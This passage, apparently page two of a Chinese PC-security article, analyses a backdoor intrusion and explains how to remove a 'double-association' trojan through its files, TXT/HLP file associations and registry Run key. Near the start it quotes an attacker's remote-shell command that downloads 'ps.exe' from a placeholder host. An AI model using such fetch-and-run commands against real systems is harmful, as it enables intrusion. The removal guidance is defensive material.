了解黑客的木马后门清除双关联木马(一)

了解黑客的木马后门清除双关联木马(一),标签：电脑安全防护,个人电脑安全,http://www.5ijcw.com

　　例如：startitshttp://www.xxx.com/hack/ps.exe

　　在远程Shell中执行上面这个命令后，“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。

　　小提示

　　对于以服务为启动方式的后门所提供的Shell，其用户身份一般都是System。

　　由于黑客在入侵时候会启动一个IE进程，如果是System身份的Shell，就不会在本地出现窗口，（这种情况符合黑客的入侵行为，避开了防火墙的权限限制）。

　　【略突出】防！

　　入侵分析结束了，接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构，为了清理后门并避免以后再出现类似入侵，老孙还特意做了一份详细的解决方案。

　　【加细框】下段可以学到：双关联木马为什么难以清除

　　黑客在入侵后种植的后门木马程序运行后会生成三个文件，分别是：

　　C:/WINDOWS/wlloginproxy.exe

　　C:/WINDOWS/Explore32.exe

　　C:/WINDOWS/system/services.exe（图3）

　　

　　伪装进程

　　这三个文件用的都是HTM文件图标，千万不要以为它们是HTM文件！如果你的系统设置为显示所有文件的扩展名，看看图4，你会发现它们都还有个“.exe”的尾巴，这说明它们是可执行文件！

　　

　　扩展名里有猫腻

　　这三个文件又分别起什么作用呢？“wlloginproxy.exe”文件用来在启动时加载运行，它是守护进程！

　　小知识

　　守护进程：

　　对木马来说，如果客户端向服务端的某一特定端口提出连接请求，服务端上的相应程序就会自动运行，来应答客户端的请求，我们称这个程序为守护进程。

　　“Explore32.exe”和“services.exe”是干什么的呢？呵呵，它们分别用来和HLP文件（帮助文件）、TXT文件（文本文件）关联，如果你发现并删除了“wlloginproxy.exe”，并不会真正清除了它。一旦打开帮助文件或文本文件，“Explore32.exe”和“services.exe”将被激活！它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马，就很难清除干净的原因！

　　【加细框】下段可以学到：双关联木马的清除方法

　　老孙的方案一：彻底清除双关联木马

　　1.删除文件

　　先删除C www.5ijcw.com :/WINDOWS下的“wlloginproxy.exe”和“Explore32.exe”文件，再删除C:/WINDOWS/system下的“services.exe”文件。如果服务端已经运行，那么就得用进程管理软件找到“wlloginproxy.exe”这个进程，然后点击“终止”，再到C:/WINDOWS下将它删除。

　　网络大补贴

　　推荐两款进程管理软件：

　　(1).大而全：Windows进程管理器v4.01，提供了700余种进程信息，以颜色分类。下载地址：http://down1.tech.sina.com.cn/download/downContent/2005-12-13/16432.shtml。

　　(2).小而精：EvonsoftTool汉化绿色版，界面清爽，操作简单。下载地址：http://down1.tech.sina.com.cn/download/down_contents/1223740800/41185.shtml。

　　2.注册表中删除

　　点击“开始→运行”，输入“regedit”打开注册表，到注册表中来删除木马的自启动文件：

　　[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]

　　"MainBroadBackManager"="C://WINDOWS//wlloginproxy.exe" 3.恢复TXT文件关联

　　先下载恢复文件关联的注册表文件（http://work.newhua.com/cfan/200807/恢复REG.rar下载），解压。双击“恢复txt.reg”，点击“确定”导入注册表，将TXT文件关联恢复。

上一页  [1] [2] [3]  下一页

上一篇：开机情况下查杀运行状态下的EXE、DLL病毒